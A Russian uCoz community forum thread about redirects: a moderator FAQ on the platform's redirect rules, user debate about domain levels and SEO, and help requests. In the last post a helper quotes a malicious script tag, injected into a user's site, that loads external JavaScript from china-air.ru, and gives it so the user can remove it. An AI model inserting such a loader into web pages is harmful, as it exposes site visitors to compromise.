Модератор форума: Yuri_G  
Сообщество uCoz » Модули uCoz » Дополнительные функции » Переадресация (редирект) (Описание темы)
Переадресация (редирект)
Модератор форума
Сообщение # 1 | 12:10:34
У меня два сайта, необходимо сделать переадресацию со старого на новый, как это можно сделать?

Мы запрещаем делать редиректы с сайта на сайт. Сайты, которые служат только редиректом, в любом случае не пройдут проверку на активность и будут удалены через время. Однако Вы можете на старом сайте разместить информацию о новом в виде ссылки и пояснительного текста о переезде, чтобы не потерять посетителей.




Я к своему сайту site.ucoz.ru прикрепил домен site.net.ru. Могу я сделать переадресацию с site.ucoz.ru на site.net.ru?

Да, можете. Для этого в общих настройках аккаунта включите опцию "Автоматически перенаправлять со стандартного домена на прикрепленный".




Мне нужно сделать переадресацию с главной, например, на форум. Как я могу это сделать?

В общих настройках аккаунта есть опция "При переходе на главную страницу открывать" - там Вы можете выбрать какой из модулей показывать при переходе на главную.




Я хочу сменить название сайта (УРЛ) и перенаправлять посетителей на новый сайт, с новым названием, но это запрещено правилами системы. Что мне делать в таком случае?

Чтобы сменить УРЛ сайта, необязательно создавать новый сайт, достаточно зарегистрировать себе домен, прикрепить его к сайту и в общих настройках аккаунта включить опцию "Автоматически перенаправлять со стандартного домена на прикрепленный"




Разрешены ли у вас внутренние редиректы? Например, у меня при заходе на главную будет перебрасывать на страницу 1.html, это разрешено?

У нас разрешены внутренние редиректы, но учтите, что если при заходе на главную будет перенаправлять на статичную страницу, то Ваш сайт могут закрыть за не активность. Необходимо чтобы посещения были именно на динамичных страницах.





Скажите, если я сделаю переадресацию с главной на форум, отразится ли это как-то на поисковиках?

Нет, фактически редиректа не происходит, а лишь место контента главной показывается контент модуля, соответственно поисковики будут видеть тот модуль при заходе на главную, который указан в общих настройках.




Если я создам поддомен к сайту poddomen.site.ru, залью туда файлы и поставлю редирект на основной домен, будет ли это караться баном?

Да, редирект с сайта на сайт запрещён в любом случае, также запрещено использовать сайт только для хранения файлов.




Мне требуется НЕ авторизованных пользователей переадресовывать на страничку (созданную в корне сайта, отдельным файлом), как мне это реализовать?

С помощью условных операторов. В шаблоны между и необходимо поставить следующий код:
Код
<?if!($USER_LOGGED_IN$)?><script type="text/javascript">window.location.href = "страница"</script><?endif?>






ВНИМАНИЕ! Переадресация с одного сайта на другой запрещена! Сайты которые служат только для переадресации будут удалены!
Kapitoshik
Сообщений: 39
Репутация: 5

Сообщение # 46 | 08:34:20
Цитата ( aibolit2007)
Так может все таки стоит дать подсказку, новичку?
Уж будьте так любезны.
Дайте.
ТС - это, что?
О какой персональной выдаче речь?
Как бы 3 года уже с юкозом, но получается еще новичок.
Нет, без шуток, подскажите, что нибуть дельное.

Если все так хорошо и на Юкозе, зачем люди прикрепляют домены первого уровня? Для красоты только? Сомневаюсь, по той простой причине, что на Украине для домена 1 уровня регистрацию торговой марки пройти нужно, а это на минутку, при самом быстром раскладе 5-6 мес и около 1 000 у.е. денег.
И все из-за стремления к благозвучию домена?!
Сообщение отредактировал Kapitoshik - Понедельник, 18 Мар 2013, 08:35:51
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 47 | 08:45:13
Kapitoshik,
Цитата
зачем люди прикрепляют домены первого уровня? Для красоты только?

Моё личное мнение основанное на прошлом опыте именно так. Тем более что поисковики в недалёком прошлом заявили что домены 2 - 3 уровня для них равны по значимости. Все разговоры типа это лучше это хуже это дороже а это бесплатно чисто условное на словах разграничение.
Смотрите сами это например домены какого уровня ?

ru.wikipedia.org
de.wikipedia.org
en.wikipedia.org

очередная фишка которая возможно стоит немалых денег ..

Сообщение отредактировал Miss_Esq - Понедельник, 18 Мар 2013, 08:46:45
Kapitoshik
Сообщений: 39
Репутация: 5

Сообщение # 48 | 10:53:06
Цитата (Kapitoshik)
ТС - это, что? О какой персональной выдаче речь?
Цитата (aibolit2007)
Так может все таки стоит дать подсказку, новичку?

И все же?
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 49 | 11:55:57
Kapitoshik,
Цитата
И все из-за стремления к благозвучию домена?!

Да ...

домены

Сообщение отредактировал Miss_Esq - Понедельник, 18 Мар 2013, 11:57:19
aibolit2007
Сообщений: 69
Репутация: 22

Сообщение # 50 | 00:19:31
Цитата (Miss_Esq)
Смотрите сами это например домены какого уровня ? ru.wikipedia.org de.wikipedia.org en.wikipedia.org очередная фишка которая возможно стоит немалых денег ..
aibolit2007
, aibolit2007, aibolit2007,
Которые воспринимаются поисковой системой как один сайт!
Не удачный пример вы привели!
Но в общем и целом вы правы! Сайты с доменами третьего уровня воспринимаются поисковыми системами, как один сайт, исключение хостинги сайтов!
Так что сайт Kapitoshik = уникален!
Цитата (Kapitoshik)
Как бы 3 года уже с юкозом, но получается еще новичок. Нет, без шуток, подскажите, что нибуть дельное


3 года и такие вопросы!
Цитата
Прикрепление нового доменного имени к сайту на юкоз - это есть полноценный 301 редирект, т.е. весь вес сайта переходит на новый домен?
Лично наблюдаю как гугл выдает периодически напротив описания моего сайта в выдаче - Юкоз)... думаю это не спроста.

Не обижайтесь, но, чем вы отличаетесь от новичка?
Цитата
ТС - это, что?


В отношении вас, насчет "ТС" - да я глюканул.
ТС= создатель темы

Цитата
О какой персональной выдаче речь?


Кто хочет, тот обретет!

Цитата
Если все так хорошо и на Юкозе, зачем люди прикрепляют домены первого уровня? Для красоты только? Сомневаюсь, по той простой причине, что на Украине для домена 1 уровня регистрацию торговой марки пройти нужно, а это на минутку, при самом быстром раскладе 5-6 мес и около 1 000 у.е. денег.
И все из-за стремления к благозвучию домена?!


Цитата (Miss_Esq)
Да ...


А престиж не в счет?
Что для вас, как покупателя лучше, домен вида шмотки.жужутуту.ру, или шмотки.ру?
Какой адрес у вас вызовет большее доверие?
Домен 2 уровня, по любому лучше!

Сообщение отредактировал aibolit2007 - Вторник, 19 Мар 2013, 00:54:57
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 51 | 00:53:02
определитесь с понятиями домен первого уровня и домен второго уровня. режут глаз ваши заявления о покупке доменов первого уровня. страна Олегархов

aibolit2007,
Цитата
Тут webanet //forum.ucoz.ru/forum/21-34453-779366-16-1321355570 надо мной стебалась, по поводу 301 редиректа!
с хостом для гугла вы погорячились. или сделали открытие о котором гуглу придется сообщить отдельно, дабы был в курсе.
есть синтаксис (набор буков и словоформ) который принимается. та к вот, в роботсе можно обращаться отдельно не только к гуглу. можно написать обращение и к яндексу, что будет читаться правильно, но будет учитываться теми сканерами, к которым идет обращение. остальные строчки будут игнорировать, как гугл игнорирует хост, как он игнорирует прямые обращения к сканеру яндекса
и гуглу не нужен хост.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
aibolit2007
Сообщений: 69
Репутация: 22

Сообщение # 52 | 01:00:06
Цитата (ааwebanet)
с хостом для гугла вы погорячились. или сделали открытие о котором гуглу придется сообщить отдельно, дабы был в курсе. есть синтаксис (набор буков и словоформ) который принимается. та к вот, в роботсе можно обращаться отдельно не только к гуглу. можно написать обращение и к яндексу, что будет читаться правильно, но будет учитываться теми сканерами, к которым идет обращение. остальные строчки будут игнорировать, как гугл игнорирует хост, как он игнорирует прямые обращения к сканеру яндекса и гуглу не нужен хост.
Знаю, но вы надомной стебались, по поводу 301 редиректа, который я обнаружил!
Знаете, для меня на тот момент, это было открытием, по скольку "сказок" начитался
Это сейчас, ваше заявление о играх с категориями, которые вы предложили у меня вызвало недоумение (по скольку я знаю как сделать, чтобы при смене категории, шел 301 редирект на новую категорию), а еще 1 год назад, вы бы меня озадачили!
К чему все это?
Будьте снисходительны к новичкам и ко мне, подскажите хотя бы элементарное!
И дайте возможность ставить серверный редирект самостоятельно, пусть и с вашего (Юкоза) согласия.

Сообщение отредактировал aibolit2007 - Вторник, 19 Мар 2013, 01:35:31
Kapitoshik
Сообщений: 39
Репутация: 5

Сообщение # 53 | 09:49:13
Цитата (aibolit2007)
Не обижайтесь, но, чем вы отличаетесь от новичка

Какие обиды. В поднятых вопросах я 100% новичок. И чего тут стесняться?!
Цитата (Miss_Esq)
Kapitoshik, ЦитатаИ все из-за стремления к благозвучию домена?! Да ... домены
Ойли. Из 20 перебранных мною фирм-раскрутчиков, 18 с первого слова отказались крутить сайт на Юкозе за любые деньги. Зговор???
Цитата (webanet)
определитесь с понятиями домен первого уровня и домен второго уровня. режут глаз ваши заявления о покупке доменов первого уровня. страна Олегархов
Да конечно второго уровня.
Вот вот. Переадресация полная и однозназная сразу или индексировать поначалу оба адреса? Может еще нюансы. Тут прозвучало - "Грамотно сделать переадресацию", а как это сделать грамотно?
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 54 | 10:29:02
aibolit2007,
Цитата
Какой адрес у вас вызовет большее доверие?

НИ ОДИН !!! Одно определение - "ШМОТКИ" отдаёт ориентацией на лохов гопников ... biggrin

А вообще типа домен третьего уровня типа такой - элитные.шмотки.рф даже четвёртого или пятого (элитные.американские.шмотки.рф, элитные.американские.секондхенд.шмотки.рф) гораздо лучше чем первого, на такие домены клюнут охотнее ... как говорится в названии домена все уже есть .. biggrin

Kapitoshik,
Цитата
Зговор???
Да .. по большому счёту большинство пиарят сайты чёрными методами, результатом которой всегда является - бан, смысла нет, так как не успеют раскрутить а сайт в бане ..

Вы какой сайт собрались раскручивать?

Сообщение отредактировал Miss_Esq - Вторник, 19 Мар 2013, 10:33:19
aibolit2007
Сообщений: 69
Репутация: 22

Сообщение # 55 | 19:45:43
Цитата (Miss_Esq)
НИ ОДИН !!! Одно определение - "ШМОТКИ" отдаёт ориентацией на лохов гопников ... А вообще типа домен третьего уровня типа такой - элитные.шмотки.рф даже четвёртого или пятого (элитные.американские.шмотки.рф, элитные.американские.секондхенд.шмотки.рф) гораздо лучше чем первого, на такие домены клюнут охотнее ... как говорится в названии домена все уже есть ..
Что лучше:
Домен вида элитные.американские.секондхенд.шмотки.рф, или элитные.американские.секондхенд.юкоз.ру?

Для того чтобы сделать американские.секондхенд.шмотки.рф, нужно быть владельцем, этого самого, который для гопников
Цитата:
""ШМОТКИ" отдаёт ориентацией на лохов гопников "
Или шмотки.рф, уже продается, наподобие ком.ру?

Сообщение отредактировал aibolit2007 - Среда, 20 Мар 2013, 19:51:19
iGrantand
Сообщений: 61
Репутация: 6

Сообщение # 56 | 16:50:21
как сделать хорошую переадресацию со старой страницы на новую?

Лучшая благодарность это плюсик в репутацию ;)
Bigrock
Сообщений: 3
Репутация: 0

Сообщение # 57 | 12:59:20
Почитав тему у меня появился только 1 вывод, поправьте если не так понял:
Поменял я для 1 страницы url:
c site.ru/category/straniza1 на site.ru/razdel/category/straniza1, то мне нужно создать 2 одинаковых страницы по этим адресам, но на страницу - site.ru/category/straniza1 вставить скрипт перенаправления на site.ru/razdel/category/straniza1 ? И возникает пару вопросов: будет ли вред для поисковиков моему сайту
от такого дубляжа ? И честно говоря не приятно иметь 2 одинаковых
страницы, пусть даже с редиректом.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 58 | 15:39:01
Bigrock, больше вреда от редиректа, чем от дубляжа. не увлекайтесь редиректами. вместо них используйте rel="canonical"

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Деееенчик
Сообщений: 190
Репутация: 116

Сообщение # 59 | 21:59:21
Здравствуйте,на моем сайте my-city.3dn.ru я сделал переадресацию на сайт denverakok.narod.ru,но 2 дня назад я купил домен и сделал переадресацию на www.on-livebox.com,я думаю что меня забанили за то что с сайта my-city.3dn.ru я сделал переадресацию с помощью кода,если меня забанили можно ли восстановить свой аккаунт (все-таки я домен 2 дня назад купил).Куда мне надо обращаться?У меня даже админ панель не открывается!А вот мой поддомен metropolis.on-livebox.com !(Я думал обратиться в службу поддержки,но как?,я ведь не могу даже в ПУ зайти!)

Добавлено (18 Июн 2013, 21:59:21)
---------------------------------------------

Цитата (Модератор форума)
Переадресация с одного сайта на другой запрещена! Сайты которые служат только для переадресации будут удалены!
Удаляйте!Но пожалуйста подскажите что с моим аккаунтом?

Благодарности в репутацию и в награды!
P.S Плюс под аватаркой)
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 60 | 22:04:35
Деееенчик, все ваши сайты открываются нормально. но сайт на народе заражен. из просилки войти или зарегистрироваться удалите скрипт

Код
<script src="http://china-air.ru/tsed.js" type="text/javascript"></script>


после удаления вредоносного кода четко и ясно поясните с чего вы взяли, что вас забанили. опишите проблему внятно

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Сообщество uCoz » Модули uCoz » Дополнительные функции » Переадресация (редирект) (Описание темы)
Поиск: